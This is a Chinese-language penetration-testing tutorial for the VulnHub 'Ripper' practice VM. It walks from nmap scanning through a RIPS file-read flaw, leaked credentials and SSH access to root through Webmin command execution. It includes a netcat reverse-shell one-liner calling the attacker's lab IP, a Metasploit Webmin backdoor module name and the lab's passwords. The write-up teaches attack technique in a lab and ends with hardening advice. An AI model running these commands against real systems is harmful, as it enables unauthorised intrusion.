VnlnHub Ripper
字数 1286 2025-08-10 20:57:54

VulnHub Ripper 靶机渗透测试教学文档

靶场信息

  • 靶机名称:Ripper
  • 下载地址:https://download.vulnhub.com/ripper/Ripper.ova
  • 作者:xiaopanghacker
  • 发布日期:2022-10-16
  • 难度等级:中级

环境准备

靶机配置

  1. 下载OVA文件后,使用VirtualBox导入
  2. 网络模式建议:
    • NAT模式(默认)
    • 或桥接模式(需与攻击机保持一致)

攻击机配置

  • 推荐使用Kali Linux
  • 确保与靶机在同一网络段

渗透测试流程

1. 信息收集

网络扫描

nmap -sn 192.168.52.0/24

发现靶机IP为192.168.52.148(假设攻击机为192.168.52.147)

端口扫描

nmap -sV -p- 192.168.52.148

扫描结果:

  • 22/tcp - SSH服务
  • 80/tcp - HTTP服务 (Apache 2.4.29)
  • 10000/tcp - HTTP服务 (MiniServ 1.910 - Webmin)

2. Web服务枚举

80端口服务

  • 访问http://192.168.52.148显示Apache默认页面
  • 目录爆破未发现有用信息

10000端口服务

  • 访问https://192.168.52.148:10000显示Webmin登录页面
  • 需要修改hosts文件: 
    echo "192.168.52.148 bogon" >> /etc/hosts

3. 漏洞发现与利用

Webmin信息收集

  • 发现robots.txt包含base64编码: 
    V2UgYXJlIHVzaW5nIFJJUFMgdG8gc2NhbiBmb3IgdnVsbmVyYWJpbGl0aWVzIGluIHBocCBjb2Rl
    解码后: 
    We are using RIPS to scan for vulnerabilities in php code

RIPS审计工具发现

  • 访问http://192.168.52.148/rips/
  • 这是一个PHP源代码审计工具

文件读取漏洞利用

  1. 使用RIPS扫描/var/www目录(勾选子目录选项)
  2. 扫描结果中发现文件泄露漏洞,存在file参数
  3. 利用方式: 
    http://192.168.52.148/rips/?file=/var/www/html/index.php
  4. 限制:只能读取网站根路径下的文件

敏感信息收集

  1. 在RIPS中使用搜索功能查找"password"
  2. 发现一组凭据: 
    用户名:ripper
密码:RIPper$!

4. 初始访问

SSH登录

ssh ripper@192.168.52.148

密码:RIPper$!

获取第一个flag

cat /home/ripper/flag1.txt

5. 权限提升(ripper → cubes)

查找cubes用户的文件

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null

发现敏感文件

  • /home/cubes/secret.file内容: 
    cubes:Cub3s4ever!

切换用户

su cubes

密码:Cub3s4ever!

6. 权限提升(cubes → root)

查找更多线索

过滤无关文件:

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v '.png' | grep -v '/proc' | grep -v '/sys'

发现Webmin日志

  • /usr/share/webmin/miniserv.log
  • 发现凭据: 
    root:toor

Webmin登录

  • 使用root:toor登录https://bogon:10000
  • 左下角有命令执行功能(root权限)

反弹shell

  1. 攻击机监听: 
    nc -lvnp 4444
  2. 在Webmin执行: 
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f

获取root flag

cat /root/flag2.txt

替代攻击路径

  • Webmin已知RCE漏洞(需认证)
  • 可使用Metasploit模块: 
    exploit/linux/http/webmin_backdoor

总结

  1. 通过信息收集发现Webmin服务
  2. 利用RIPS审计工具发现文件泄露漏洞
  3. 获取SSH凭据实现初始访问
  4. 通过查找敏感文件实现横向移动
  5. 利用Webmin的认证后命令执行功能获取root权限

安全建议

  1. 及时更新Webmin到最新版本
  2. 避免使用默认或弱密码
  3. 限制敏感文件的访问权限
  4. 审计工具不应部署在生产环境
  5. 实施最小权限原则
VulnHub Ripper 靶机渗透测试教学文档 靶场信息 靶机名称:Ripper 下载地址:https://download.vulnhub.com/ripper/Ripper.ova 作者:xiaopanghacker 发布日期:2022-10-16 难度等级:中级 环境准备 靶机配置 下载OVA文件后,使用VirtualBox导入 网络模式建议: NAT模式(默认) 或桥接模式(需与攻击机保持一致) 攻击机配置 推荐使用Kali Linux 确保与靶机在同一网络段 渗透测试流程 1. 信息收集 网络扫描 发现靶机IP为192.168.52.148(假设攻击机为192.168.52.147) 端口扫描 扫描结果: 22/tcp - SSH服务 80/tcp - HTTP服务 (Apache 2.4.29) 10000/tcp - HTTP服务 (MiniServ 1.910 - Webmin) 2. Web服务枚举 80端口服务 访问http://192.168.52.148显示Apache默认页面 目录爆破未发现有用信息 10000端口服务 访问https://192.168.52.148:10000显示Webmin登录页面 需要修改hosts文件: 3. 漏洞发现与利用 Webmin信息收集 发现robots.txt包含base64编码: 解码后: RIPS审计工具发现 访问http://192.168.52.148/rips/ 这是一个PHP源代码审计工具 文件读取漏洞利用 使用RIPS扫描/var/www目录(勾选子目录选项) 扫描结果中发现文件泄露漏洞,存在file参数 利用方式: 限制:只能读取网站根路径下的文件 敏感信息收集 在RIPS中使用搜索功能查找"password" 发现一组凭据: 4. 初始访问 SSH登录 密码:RIPper$ ! 获取第一个flag 5. 权限提升(ripper → cubes) 查找cubes用户的文件 发现敏感文件 /home/cubes/secret.file内容: 切换用户 密码:Cub3s4ever ! 6. 权限提升(cubes → root) 查找更多线索 过滤无关文件: 发现Webmin日志 /usr/share/webmin/miniserv.log 发现凭据: Webmin登录 使用root:toor登录https://bogon:10000 左下角有命令执行功能(root权限) 反弹shell 攻击机监听: 在Webmin执行: 获取root flag 替代攻击路径 Webmin已知RCE漏洞(需认证) 可使用Metasploit模块: 总结 通过信息收集发现Webmin服务 利用RIPS审计工具发现文件泄露漏洞 获取SSH凭据实现初始访问 通过查找敏感文件实现横向移动 利用Webmin的认证后命令执行功能获取root权限 安全建议 及时更新Webmin到最新版本 避免使用默认或弱密码 限制敏感文件的访问权限 审计工具不应部署在生产环境 实施最小权限原则